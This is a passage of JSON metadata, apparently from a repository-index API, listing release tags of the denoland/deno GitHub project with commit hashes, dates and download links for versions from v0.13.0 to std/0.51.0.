:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{